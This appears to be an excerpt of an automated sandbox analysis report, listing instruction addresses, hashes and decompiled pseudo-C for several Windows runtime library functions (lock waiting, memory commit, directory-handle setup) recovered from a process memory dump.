                                                                              0x0176fb1d
                                                                              0x0176fb1e
                                                                              0x0176fb1f
                                                                              0x0176fb20
                                                                              0x0176fb21
                                                                              0x0176fb22
                                                                              0x0176fb23
                                                                              0x0176fb24
                                                                              0x0176fb25
                                                                              0x0176fb26
                                                                              0x0176fb27
                                                                              0x0176fb28
                                                                              0x0176fb29
                                                                              0x0176fb2a
                                                                              0x0176fb2b
                                                                              0x0176fb2c
                                                                              0x0176fb2d
                                                                              0x0176fb2e
                                                                              0x0176fb2f
                                                                              0x0176fb3a
                                                                              0x0176fb3b
                                                                              0x0176fb3e
                                                                              0x0176fb41
                                                                              0x0176fb44
                                                                              0x0176fb47
                                                                              0x0176fb4a
                                                                              0x0176fb4d
                                                                              0x0176fb53
                                                                              0x017abdcb
                                                                              0x017abdcb
                                                                              0x0176fb59
                                                                              0x0176fb5b
                                                                              0x0176fb5b
                                                                              0x0176fb5e
                                                                              0x017abdd5
                                                                              0x017abdd8
                                                                              0x00000000
                                                                              0x017abdda
                                                                              0x00000000
                                                                              0x017abdda
                                                                              0x0176fb64
                                                                              0x0176fb64
                                                                              0x0176fb64
                                                                              0x0176fb67
                                                                              0x0176fb6e
                                                                              0x0176fb70
                                                                              0x0176fb72
                                                                              0x00000000
                                                                              0x0176fb78
                                                                              0x0176fb7a
                                                                              0x0176fb7a
                                                                              0x0176fb7d
                                                                              0x0176fb80
                                                                              0x017abddf
                                                                              0x017abde1
                                                                              0x00000000
                                                                              0x017abde3
                                                                              0x00000000
                                                                              0x017abde3
                                                                              0x0176fb86
                                                                              0x0176fb86
                                                                              0x0176fb86
                                                                              0x0176fb8b
                                                                              0x0176fb90
                                                                              0x0176fb92
                                                                              0x0176fb94
                                                                              0x0176fb9a
                                                                              0x0176fb9b
                                                                              0x0176fba1
                                                                              0x017abde8
                                                                              0x017abdeb
                                                                              0x017abded
                                                                              0x017abeb5
                                                                              0x017abeb5
                                                                              0x017abebb
                                                                              0x017abebd
                                                                              0x017abec3
                                                                              0x017abed2
                                                                              0x017abedd
                                                                              0x017abedd
                                                                              0x017abeed
                                                                              0x00000000
                                                                              0x017abdf3
                                                                              0x017abdfe
                                                                              0x017abe06
                                                                              0x017abe0b
                                                                              0x017abe0d
                                                                              0x017abe0f
                                                                              0x017abe14
                                                                              0x017abe19
                                                                              0x017abe20
                                                                              0x017abe25
                                                                              0x017abe27
                                                                              0x017abe35
                                                                              0x017abe39
                                                                              0x017abe46
                                                                              0x017abe4f
                                                                              0x017abe54
                                                                              0x017abe56
                                                                              0x017abef8
                                                                              0x017abef8
                                                                              0x00000000
                                                                              0x017abe5c
                                                                              0x017abe5c
                                                                              0x017abe60
                                                                              0x00000000
                                                                              0x017abe66
                                                                              0x017abe66
                                                                              0x017abe7f
                                                                              0x017abe84
                                                                              0x017abe87
                                                                              0x017abe89
                                                                              0x017abe8b
                                                                              0x017abe99
                                                                              0x017abe9d
                                                                              0x017abea0
                                                                              0x017abeac
                                                                              0x017abeaf
                                                                              0x017abeb1
                                                                              0x017abeb3
                                                                              0x017abeb3
                                                                              0x00000000
                                                                              0x017abea2
                                                                              0x017abea2
                                                                              0x00000000
                                                                              0x017abea2
                                                                              0x017abe8d
                                                                              0x017abe8d
                                                                              0x017abe92
                                                                              0x00000000
                                                                              0x017abe92
                                                                              0x017abe8b
                                                                              0x017abe60
                                                                              0x017abe3b
                                                                              0x017abe3b
                                                                              0x017abe3e
                                                                              0x00000000
                                                                              0x017abe40
                                                                              0x017abe40
                                                                              0x017abe44
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017abe44
                                                                              0x017abe3e
                                                                              0x017abe29
                                                                              0x017abe29
                                                                              0x00000000
                                                                              0x017abe29
                                                                              0x017abe27
                                                                              0x00000000
                                                                              0x0176fba7
                                                                              0x0176fba7
                                                                              0x0176fbab
                                                                              0x017abf02
                                                                              0x0176fbb1
                                                                              0x0176fbb1
                                                                              0x0176fbb8
                                                                              0x0176fbbd
                                                                              0x0176fbbd
                                                                              0x0176fbbf
                                                                              0x0176fbbf
                                                                              0x0176fbc5
                                                                              0x0176fbcb
                                                                              0x0176fbf8
                                                                              0x0176fbf8
                                                                              0x0176fbfa
                                                                              0x00000000
                                                                              0x0176fc00
                                                                              0x0176fc00
                                                                              0x0176fc03
                                                                              0x00000000
                                                                              0x0176fc09
                                                                              0x0176fc09
                                                                              0x0176fc0f
                                                                              0x0176fc15
                                                                              0x0176fc23
                                                                              0x0176fc23
                                                                              0x0176fc25
                                                                              0x0176fc27
                                                                              0x0176fc75
                                                                              0x0176fc7c
                                                                              0x0176fc84
                                                                              0x00000000
                                                                              0x0176fc29
                                                                              0x0176fc29
                                                                              0x0176fc2d
                                                                              0x0176fc30
                                                                              0x017abf0f
                                                                              0x00000000
                                                                              0x0176fc36
                                                                              0x0176fc38
                                                                              0x0176fc3b
                                                                              0x0176fc41
                                                                              0x017abf17
                                                                              0x017abf19
                                                                              0x017abf48
                                                                              0x017abf4b
                                                                              0x00000000
                                                                              0x017abf1b
                                                                              0x017abf22
                                                                              0x017abf24
                                                                              0x017abf26
                                                                              0x00000000
                                                                              0x017abf2c
                                                                              0x017abf37
                                                                              0x017abf39
                                                                              0x017abf3b
                                                                              0x00000000
                                                                              0x017abf41
                                                                              0x017abf41
                                                                              0x017abf41
                                                                              0x017abf41
                                                                              0x017abf45
                                                                              0x00000000
                                                                              0x017abf45
                                                                              0x017abf3b
                                                                              0x017abf26
                                                                              0x00000000
                                                                              0x0176fc47
                                                                              0x0176fc47
                                                                              0x0176fc49
                                                                              0x0176fcb2
                                                                              0x0176fcb4
                                                                              0x0176fcb6
                                                                              0x0176fcdc
                                                                              0x0176fcdc
                                                                              0x00000000
                                                                              0x0176fcb8
                                                                              0x0176fcc3
                                                                              0x0176fcc5
                                                                              0x0176fcc7
                                                                              0x00000000
                                                                              0x0176fcc9
                                                                              0x0176fcc9
                                                                              0x0176fccd
                                                                              0x00000000
                                                                              0x0176fccd
                                                                              0x0176fcc7
                                                                              0x00000000
                                                                              0x0176fc4b
                                                                              0x0176fc4b
                                                                              0x0176fc4e
                                                                              0x0176fc4e
                                                                              0x0176fc51
                                                                              0x0176fc51
                                                                              0x0176fc54
                                                                              0x0176fc5a
                                                                              0x0176fc5c
                                                                              0x0176fc5f
                                                                              0x0176fc61
                                                                              0x0176fc63
                                                                              0x0176fc65
                                                                              0x0176fc67
                                                                              0x0176fc6e
                                                                              0x0176fc72
                                                                              0x0176fc72
                                                                              0x0176fc72
                                                                              0x0176fc72
                                                                              0x0176fc67
                                                                              0x0176fc61
                                                                              0x00000000
                                                                              0x0176fc5a
                                                                              0x0176fc49
                                                                              0x0176fc41
                                                                              0x0176fc30
                                                                              0x0176fc27
                                                                              0x0176fc03
                                                                              0x0176fbcd
                                                                              0x0176fbd3
                                                                              0x0176fbd9
                                                                              0x0176fbdc
                                                                              0x0176fbde
                                                                              0x0176fc99
                                                                              0x0176fc9b
                                                                              0x0176fc9d
                                                                              0x0176fcd5
                                                                              0x0176fcd5
                                                                              0x0176fc89
                                                                              0x0176fc89
                                                                              0x00000000
                                                                              0x0176fc9f
                                                                              0x0176fc9f
                                                                              0x0176fca3
                                                                              0x00000000
                                                                              0x0176fca3
                                                                              0x00000000
                                                                              0x0176fbe4
                                                                              0x0176fbe4
                                                                              0x0176fbe4
                                                                              0x0176fbe4
                                                                              0x0176fbe9
                                                                              0x0176fbf2
                                                                              0x00000000
                                                                              0x0176fbf2
                                                                              0x0176fbde
                                                                              0x0176fbcb
                                                                              0x0176fbab
                                                                              0x0176fc8b
                                                                              0x0176fc8b
                                                                              0x0176fc8c
                                                                              0x0176fb80
                                                                              0x0176fb72
                                                                              0x0176fb5e
                                                                              0x0176fc8d
                                                                              0x0176fc91
                                                                              0x0176fadf
                                                                              0x0176fadf
                                                                              0x0176fae1
                                                                              0x0176fae4
                                                                              0x0176fae7
                                                                              0x0176faec
                                                                              0x0176faf8
                                                                              0x0176fb00
                                                                              0x0176fb07
                                                                              0x0176fb0f
                                                                              0x0176fb0f
                                                                              0x0176fb07
                                                                              0x00000000
                                                                              0x0176faf8
                                                                              0x0176fadd

                                                                              Strings
                                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 017ABE0F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                              • API String ID: 0-865735534
                                                                              • Opcode ID: c11657752c114a0b271c0315cef9e618cdb63a57bf0ab4599f311e5f69620604
                                                                              • Instruction ID: d3b6a75d3459f13d9bc8c6a78d1975422957f03960541ff1a06fca7650bc54d9
                                                                              • Opcode Fuzzy Hash: c11657752c114a0b271c0315cef9e618cdb63a57bf0ab4599f311e5f69620604
                                                                              • Instruction Fuzzy Hash: 76A12731B006068BEB26CF6DD46477AF7A9BF88710F04466AEE16CB685DB30D841CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01732D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 63%
                                                                              			E01732D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1825350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1827bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E017797C0();
				}
				if( *0x18279c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18279c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01761624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01757D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E017CFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01779520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0176E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0178DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1826901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1826901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01779980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E017795D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01757D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01757D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E017B7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E017CFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1825350;
							if(_t109 != 0x1825350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E017CFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E017C5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                              0x01732d8a
                                                                              0x01732d8a
                                                                              0x01732d92
                                                                              0x01732d96
                                                                              0x01732d9e
                                                                              0x01732da0
                                                                              0x01732da3
                                                                              0x01732da5
                                                                              0x01732da8
                                                                              0x01732dab
                                                                              0x01732db2
                                                                              0x0178f9aa
                                                                              0x0178f9ab
                                                                              0x0178f9ae
                                                                              0x0178f9ae
                                                                              0x01732db8
                                                                              0x01732dc2
                                                                              0x0178f9b9
                                                                              0x0178f9be
                                                                              0x0178f9bf
                                                                              0x0178f9bf
                                                                              0x01732dcf
                                                                              0x0178f9c9
                                                                              0x01732dd5
                                                                              0x01732dd5
                                                                              0x01732dd5
                                                                              0x01732dde
                                                                              0x01732de1
                                                                              0x01732e70
                                                                              0x01732e72
                                                                              0x01732e72
                                                                              0x01732de7
                                                                              0x01732deb
                                                                              0x01732e7c
                                                                              0x01732e83
                                                                              0x01732e85
                                                                              0x01732e8b
                                                                              0x01732e8d
                                                                              0x01732e92
                                                                              0x01732e92
                                                                              0x01732e85
                                                                              0x01732df1
                                                                              0x01732df7
                                                                              0x01732df9
                                                                              0x01732df9
                                                                              0x01732dfc
                                                                              0x01732dff
                                                                              0x01732e02
                                                                              0x00000000
                                                                              0x01732e05
                                                                              0x01732e0c
                                                                              0x0178f9d9
                                                                              0x01732e12
                                                                              0x01732e12
                                                                              0x01732e12
                                                                              0x01732e1a
                                                                              0x0178f9e3
                                                                              0x0178f9e9
                                                                              0x0178f9f0
                                                                              0x0178f9f6
                                                                              0x0178f9f8
                                                                              0x0178f9f8
                                                                              0x0178f9f0
                                                                              0x01732e23
                                                                              0x0178fa02
                                                                              0x0178fa03
                                                                              0x0178fa05
                                                                              0x0178fa06
                                                                              0x00000000
                                                                              0x01732e29
                                                                              0x01732e29
                                                                              0x01732e2e
                                                                              0x01732e34
                                                                              0x01732e3e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01732e44
                                                                              0x01732e47
                                                                              0x01732e4d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01732e4f
                                                                              0x01732e54
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01732e5a
                                                                              0x01732e5f
                                                                              0x01732e9a
                                                                              0x01732ea4
                                                                              0x01732ea5
                                                                              0x01732ea8
                                                                              0x01732eaf
                                                                              0x01732eb2
                                                                              0x01732eb5
                                                                              0x0178fae9
                                                                              0x0178faeb
                                                                              0x0178faed
                                                                              0x0178faef
                                                                              0x0178faf7
                                                                              0x0178faf8
                                                                              0x0178fafd
                                                                              0x0178faff
                                                                              0x0178fb04
                                                                              0x0178fb04
                                                                              0x0178faff
                                                                              0x01732ec0
                                                                              0x01732ec4
                                                                              0x01732ec6
                                                                              0x01732ec8
                                                                              0x0178fb14
                                                                              0x0178fb18
                                                                              0x0178fb1e
                                                                              0x0178fb21
                                                                              0x0178fb21
                                                                              0x01732ece
                                                                              0x01732ece
                                                                              0x01732ece
                                                                              0x01732ed7
                                                                              0x01732e61
                                                                              0x01732e63
                                                                              0x0178fa6b
                                                                              0x0178fa71
                                                                              0x0178fa76
                                                                              0x0178fa78
                                                                              0x0178fa8a
                                                                              0x0178fa7a
                                                                              0x0178fa83
                                                                              0x0178fa83
                                                                              0x0178fa8f
                                                                              0x0178fa91
                                                                              0x0178fa97
                                                                              0x0178fa9d
                                                                              0x0178faa4
                                                                              0x0178faaa
                                                                              0x0178faaf
                                                                              0x0178fab1
                                                                              0x0178fac3
                                                                              0x0178fab3
                                                                              0x0178fabc
                                                                              0x0178fabc
                                                                              0x0178fac8
                                                                              0x0178facb
                                                                              0x0178fadf
                                                                              0x0178fadf
                                                                              0x0178facb
                                                                              0x0178faa4
                                                                              0x0178fa91
                                                                              0x01732e6f
                                                                              0x01732e6f
                                                                              0x01732e5f
                                                                              0x0178fa13
                                                                              0x0178fa15
                                                                              0x0178fa17
                                                                              0x0178fa1f
                                                                              0x0178fa21
                                                                              0x0178fa22
                                                                              0x0178fa25
                                                                              0x0178fa28
                                                                              0x0178fa2f
                                                                              0x0178fa2f
                                                                              0x0178fa2a
                                                                              0x0178fa2a
                                                                              0x0178fa2a
                                                                              0x0178fa31
                                                                              0x0178fa34
                                                                              0x0178fa36
                                                                              0x0178fa3c
                                                                              0x0178fa3e
                                                                              0x0178fa41
                                                                              0x0178fa43
                                                                              0x0178fa45
                                                                              0x0178fa45
                                                                              0x0178fa41
                                                                              0x0178fa3c
                                                                              0x0178fa4a
                                                                              0x0178fa4f
                                                                              0x0178fa51
                                                                              0x0178fa53
                                                                              0x0178fa56
                                                                              0x0178fa5b
                                                                              0x0178fa5e
                                                                              0x00000000
                                                                              0x0178fa5e
                                                                              0x01732e23

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RTL: Re-Waiting
                                                                              • API String ID: 0-316354757
                                                                              • Opcode ID: 7be01d57229187ad6a76d2e8a3ca19476bab5a1f7cb5defd3a3c1f3f14bc9dc8
                                                                              • Instruction ID: f1a45e618574e515110a7a0a676e0abaedd83a8259b47e69e37236aa2cf261e3
                                                                              • Opcode Fuzzy Hash: 7be01d57229187ad6a76d2e8a3ca19476bab5a1f7cb5defd3a3c1f3f14bc9dc8
                                                                              • Instruction Fuzzy Hash: DC614931A80605AFDB32EF6CC848B7EFBA5EB89720F140299D911972C3C7749A40C792
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01800EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E01800EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E017FFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01801074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01779730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E017FA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E017FA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1828b04 >> 0x14) + (_v44 -  *0x1828b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01757D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E017F138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01757D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E017EFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1828724 & 0x00000008) != 0) {
						E017F52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E018015B5(0x1828ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                              0x01800eb7
                                                                              0x01800eb9
                                                                              0x01800ec0
                                                                              0x01800ec2
                                                                              0x01800ecd
                                                                              0x0180105b
                                                                              0x0180105b
                                                                              0x01801061
                                                                              0x01801066
                                                                              0x01801066
                                                                              0x0180106b
                                                                              0x01801073
                                                                              0x01801073
                                                                              0x01800ed3
                                                                              0x01800ed6
                                                                              0x01800edc
                                                                              0x01800ee0
                                                                              0x01800ee7
                                                                              0x01800ef0
                                                                              0x01800ef5
                                                                              0x01800efa
                                                                              0x01800efc
                                                                              0x01800efd
                                                                              0x01800f03
                                                                              0x01800f04
                                                                              0x01800f06
                                                                              0x01800f07
                                                                              0x01800f09
                                                                              0x01800f0e
                                                                              0x01800f14
                                                                              0x01800f23
                                                                              0x01800f2d
                                                                              0x01800f34
                                                                              0x01800f34
                                                                              0x01800f14
                                                                              0x01800f52
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01800f58
                                                                              0x01800f73
                                                                              0x01800f74
                                                                              0x01800f79
                                                                              0x01800f7d
                                                                              0x01800f80
                                                                              0x01800f86
                                                                              0x01800fab
                                                                              0x01800fb5
                                                                              0x01800fc6
                                                                              0x01800fd1
                                                                              0x01800fe3
                                                                              0x01800fd3
                                                                              0x01800fdc
                                                                              0x01800fdc
                                                                              0x01800feb
                                                                              0x01801009
                                                                              0x01801009
                                                                              0x01801015
                                                                              0x01801027
                                                                              0x01801017
                                                                              0x01801020
                                                                              0x01801020
                                                                              0x0180102f
                                                                              0x0180103c
                                                                              0x0180103c
                                                                              0x01801048
                                                                              0x01801050
                                                                              0x01801050
                                                                              0x01801055
                                                                              0x00000000
                                                                              0x01801055
                                                                              0x01800f88
                                                                              0x01800f9e
                                                                              0x01800fa2
                                                                              0x01800fa9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01800fa9
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `
                                                                              • API String ID: 0-2679148245
                                                                              • Opcode ID: 1977f1f54262339abcc1f78d300ae3e0c7708e7650e6ebce8ccc8bab6b4d3f2e
                                                                              • Instruction ID: 3fade79c59492b8636afd0b81d25e857c77243cb288bcffcbf46c6478ca2c107
                                                                              • Opcode Fuzzy Hash: 1977f1f54262339abcc1f78d300ae3e0c7708e7650e6ebce8ccc8bab6b4d3f2e
                                                                              • Instruction Fuzzy Hash: 4A51AE713043469FD766DF18D888B1BBBE5EB84754F04092CFA86C72D1D670EA05C762
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0176F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 75%
                                                                              			E0176F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01754120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01779830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01779990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017795D0();
							goto L11;
						} else {
							_t109 = L01754620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0177F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017795D0();
										L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                              0x0176f0d3
                                                                              0x0176f0d9
                                                                              0x0176f0e0
                                                                              0x0176f0e7
                                                                              0x0176f0f2
                                                                              0x0176f0f4
                                                                              0x0176f0f8
                                                                              0x0176f100
                                                                              0x0176f108
                                                                              0x0176f10d
                                                                              0x0176f115
                                                                              0x0176f116
                                                                              0x0176f11f
                                                                              0x0176f123
                                                                              0x0176f124
                                                                              0x0176f12c
                                                                              0x0176f130
                                                                              0x0176f134
                                                                              0x0176f13d
                                                                              0x0176f144
